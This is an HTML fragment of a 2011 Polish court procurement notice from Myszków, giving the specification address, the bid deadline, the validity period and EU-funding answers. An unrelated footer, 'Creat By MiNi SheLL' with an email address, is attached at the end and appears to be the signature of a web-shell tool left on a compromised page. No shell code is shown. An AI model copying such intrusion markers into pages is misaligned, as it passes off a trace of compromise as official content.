<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.myszkow.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Myszkowie ul. Kwiatkowskiego 2, 42-300 Myszków, pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2011 godzina 10:00, miejsce: Sąd Rejonowy w Myszkowie ul. Kwiatkowskiego 2, 42-300 Myszków, pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com